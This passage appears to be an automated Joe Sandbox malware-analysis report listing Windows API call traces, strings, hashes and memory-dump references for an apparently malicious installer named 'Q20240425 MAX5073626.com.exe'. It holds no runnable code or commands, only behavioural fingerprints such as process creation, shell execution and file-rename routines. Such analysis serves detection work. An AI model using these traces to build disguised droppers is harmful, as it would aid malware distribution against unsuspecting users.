                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: de930baa0e2a58f77538b2a89e1362d0c7efc2ca4dac646fb397eb4491356700
                          • Instruction ID: ce5b77e42761d051481a6340a4a56d84fd9774357d16012dc5024840c1df7dc4
                          • Opcode Fuzzy Hash: de930baa0e2a58f77538b2a89e1362d0c7efc2ca4dac646fb397eb4491356700
                          • Instruction Fuzzy Hash: 0BB09271240200AADA214F009F0AF057A22AB90B00F108424B294280F086711020EA1E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000028,?,00000001,0040536D), ref: 00405546
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: c1fd066e34f8f0514121f54d03d528568694c8aa75b8d57a89629eadf2f3353d
                          • Instruction ID: ebd57303e312e9373dfc843e04a7116ce18383ca8610824dadd53071523c2981
                          • Opcode Fuzzy Hash: c1fd066e34f8f0514121f54d03d528568694c8aa75b8d57a89629eadf2f3353d
                          • Instruction Fuzzy Hash: DEB092B5281601BBDA616B00DE09F49BA62A7A4701F008428B244240F0CAB600E5DB08
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00405D6F: lstrlenW.KERNEL32(Completed,?,00000000,?,?), ref: 00405DA1
                            • Part of subcall function 00405D6F: lstrlenW.KERNEL32(?,Completed,?,00000000,?,?), ref: 00405DB3
                            • Part of subcall function 00405D6F: lstrcatW.KERNEL32(Completed,?), ref: 00405DCE
                            • Part of subcall function 00405D6F: SetWindowTextW.USER32(Completed,Completed), ref: 00405DE6
                            • Part of subcall function 00405D6F: SendMessageW.USER32(?), ref: 00405E0D
                            • Part of subcall function 00405D6F: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405E28
                            • Part of subcall function 00405D6F: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E35
                            • Part of subcall function 004066FC: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00424A20,?,?,?,Pata c",?), ref: 00406725
                            • Part of subcall function 004066FC: CloseHandle.KERNEL32(?,?,?,Pata c",?), ref: 00406732
                          • CloseHandle.KERNEL32(?,?), ref: 00402110
                            • Part of subcall function 0040653A: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406544
                            • Part of subcall function 0040653A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040656E
                            • Part of subcall function 00406645: wsprintfW.USER32 ref: 00406652
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                          • String ID:
                          • API String ID: 2972824698-0
                          • Opcode ID: 248ccf485ffc6f0f509cb05982f504799725f01242cb947737ef08aa35f951a0
                          • Instruction ID: 70dbf160186826cc0d7b56e25a286b1d518f06b7dcb5b143dd8eaf919be1be91
                          • Opcode Fuzzy Hash: 248ccf485ffc6f0f509cb05982f504799725f01242cb947737ef08aa35f951a0
                          • Instruction Fuzzy Hash: A4F0C8356093629BC310AF65EC8882F7398EF45359B100A3FFA52B51D1C77D4D068AAF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 0040446B
                          • GetDlgItem.USER32(?,00000408), ref: 00404477
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004044BF
                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044D8
                          • SetWindowLongW.USER32(00000000,000000FC,Function_00005905), ref: 004044EF
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404505
                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404517
                          • SendMessageW.USER32(00000000,00001109,00000002), ref: 0040452A
                          • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404536
                          • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 00404548
                          • DeleteObject.GDI32(00000000), ref: 0040454B
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404579
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404583
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040462E
                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404658
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040466E
                          • GetWindowLongW.USER32(?,000000F0), ref: 0040469D
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046AA
                          • ShowWindow.USER32(?,00000005), ref: 004046BE
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047FB
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404876
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404895
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004048C1
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048F6
                          • ImageList_Destroy.COMCTL32(00000000), ref: 0040491D
                          • GlobalFree.KERNEL32(00000000), ref: 0040492D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                          • String ID: M
                          • API String ID: 1688767230-3664761504
                          • Opcode ID: 2b9c824d5e411375aeb6c19a129e7f31917e6c6f88e5252853449caae0cf6005
                          • Instruction ID: 3ae6289146d33c83ffa99c4b1196d227f3808f9024a2eb34a9bbb364589a3c4d
                          • Opcode Fuzzy Hash: 2b9c824d5e411375aeb6c19a129e7f31917e6c6f88e5252853449caae0cf6005
                          • Instruction Fuzzy Hash: F912BEB1604700AFD720AF24DD45A2BB6E9EBC8314F10493EFA95E72E1D7789C418B99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 0040410B
                          • SetWindowTextW.USER32(00000000,?), ref: 00404135
                            • Part of subcall function 00406A60: GetDlgItemTextW.USER32(?,?,00000400,00404F81), ref: 00406A73
                            • Part of subcall function 00406D63: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DD8
                            • Part of subcall function 00406D63: CharNextW.USER32(?,?,?,00000000), ref: 00406DE7
                            • Part of subcall function 00406D63: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DEC
                            • Part of subcall function 00406D63: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406E04
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Char$Next$ItemText$PrevWindow
                          • String ID: : Completed$A$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest$Farserer248 Setup: Completed
                          • API String ID: 4089110348-1948780045
                          • Opcode ID: e8da0398027bbdd381c3d5239bc3d47e41d793370108c6d054f61ce649ba3777
                          • Instruction ID: 7e70b2b2f584af16b2edeccdbbc43ba6c1c0b0e817574e56c760c2cb475d8cf6
                          • Opcode Fuzzy Hash: e8da0398027bbdd381c3d5239bc3d47e41d793370108c6d054f61ce649ba3777
                          • Instruction Fuzzy Hash: 2091C1B1704311ABD720AF659D81B6B76A8EF84704F40083EFB81B62D1DA7CD9418B6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                          • Instruction ID: 41dab7a86df8ef5394c2aff2d5977b3801170d4b09e85d90b9f9b9bad106732f
                          • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                          • Instruction Fuzzy Hash: 5EC14AB1A0C3918FD364CF29C48076ABBE1FBC5304F10892EE5DA9B391D678A546CB57
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CheckDlgButton.USER32(?,?,00000001), ref: 00403E5E
                          • EnableWindow.USER32(?), ref: 00403E6B
                          • GetDlgItem.USER32(?,000003E8), ref: 00403E77
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E93
                          • GetSysColor.USER32(?), ref: 00403EA4
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403EB2
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403EC0
                          • lstrlenW.KERNEL32(?), ref: 00403EC6
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403ED3
                          • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EEA
                          • GetDlgItem.USER32(?,0000040A), ref: 00403F46
                          • SendMessageW.USER32(00000000), ref: 00403F4D
                          • EnableWindow.USER32(00000000), ref: 00403F6A
                          • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F8E
                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FE3
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00403FF5
                          • SetCursor.USER32(00000000), ref: 00403FFE
                            • Part of subcall function 00406A19: ShellExecuteExW.SHELL32(?), ref: 00406A28
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404040
                          • SetCursor.USER32(00000000), ref: 00404043
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040406F
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404087
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                          • String ID: : Completed$N
                          • API String ID: 3270077613-2140067464
                          • Opcode ID: bf0178411473ff10941449b467adfe2069e6fc217bc1edb55ad2b2574033c5e5
                          • Instruction ID: bdc84539c7c508f33aefe0d42d4484ce4fd958cb88caf660b8e627917a3e43f3
                          • Opcode Fuzzy Hash: bf0178411473ff10941449b467adfe2069e6fc217bc1edb55ad2b2574033c5e5
                          • Instruction Fuzzy Hash: A0818EB1604305AFD710AF25DE44A6B7BE9FF84344F40493EF681A63A0C7789945CF5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                          • BeginPaint.USER32(?,?), ref: 0040104C
                          • GetClientRect.USER32(?,?), ref: 00401062
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                          • DeleteObject.GDI32(00000000), ref: 004010FA
                          • CreateFontIndirectW.GDI32(?), ref: 00401120
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                          • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                          • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                          • DrawTextW.USER32(00000000,00428520,000000FF,?,00000820), ref: 00401171
                          • SelectObject.GDI32(00000000,00000000), ref: 00401179
                          • DeleteObject.GDI32(?), ref: 0040117F
                          • EndPaint.USER32(?,?), ref: 0040118E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: e7fa8d92a1558c4ea8e958914b5aa13377a66172074e4a1f1d833ba53ee1e4d8
                          • Instruction ID: dc4be63c5e8de3cd74dd871a81a13d155a017f574f4c6123245c4fd1fc1e808f
                          • Opcode Fuzzy Hash: e7fa8d92a1558c4ea8e958914b5aa13377a66172074e4a1f1d833ba53ee1e4d8
                          • Instruction Fuzzy Hash: 3341BF720083549FC7159F65CE4496BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,00406284,?,?), ref: 00406367
                          • GetShortPathNameW.KERNEL32(00000000,00426668,00000400), ref: 00406370
                          • GetShortPathNameW.KERNEL32(?,00425E68,00000400), ref: 0040638D
                          • wsprintfA.USER32 ref: 004063AB
                          • GetFileSize.KERNEL32(00000000,00000000,00425E68,C0000000,00000004,00425E68,?), ref: 004063E3
                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063F3
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406423
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00425A68,00000000,-0000000A,00408974,00000000,[Rename],00000000,00000000,00000000), ref: 00406443
                          • GlobalFree.KERNEL32(00000000), ref: 00406455
                          • CloseHandle.KERNEL32(00000000), ref: 0040645C
                            • Part of subcall function 00406941: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406945
                            • Part of subcall function 00406941: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00406965
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                          • String ID: %ls=%ls$[Rename]$h^B$hfB
                          • API String ID: 2900126502-1171329002
                          • Opcode ID: 08820cf81893cd09225f6d25635c9de625048d9f9863f0c3732bc9614dc3286f
                          • Instruction ID: 4ebeefcf15104caf89f22b2962055c2ad1d3527d62e6eb1e65ccd43345ed30ff
                          • Opcode Fuzzy Hash: 08820cf81893cd09225f6d25635c9de625048d9f9863f0c3732bc9614dc3286f
                          • Instruction Fuzzy Hash: F33112B12003117BD6202B359E89F7B3A5CDF41718F16453EF942F62C2DA7D89228ABD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DD8
                          • CharNextW.USER32(?,?,?,00000000), ref: 00406DE7
                          • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DEC
                          • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406E04
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D65
                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D6A
                          • *?|<>/":, xrefs: 00406DC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                          • API String ID: 589700163-562438032
                          • Opcode ID: 4a806303372201b3e8df9637a6b3a61e7899050057b59a545d854bca18571292
                          • Instruction ID: 56bb63df9d635c950e2032d71a4c8880cc5c791d76c9d1321567f0f8dd80229c
                          • Opcode Fuzzy Hash: 4a806303372201b3e8df9637a6b3a61e7899050057b59a545d854bca18571292
                          • Instruction Fuzzy Hash: AC11E425A0032556DA306B2A8D5097B72E8DFA9761706443FF9C7E32C0E77D9CA192BC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: eedd63969569932ea17edb4e5e3784b85700800fb6918c00c6094634e57bf2b4
                          • Instruction ID: 663babe93e8c93df55c8e925e3f7365def0f2c4ff50b98774ac04a93d9623ac7
                          • Opcode Fuzzy Hash: eedd63969569932ea17edb4e5e3784b85700800fb6918c00c6094634e57bf2b4
                          • Instruction Fuzzy Hash: E3210772500A049FCB34AF68DA88A5B77F4EF05710B048A3DE896A26A0CB38E814CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
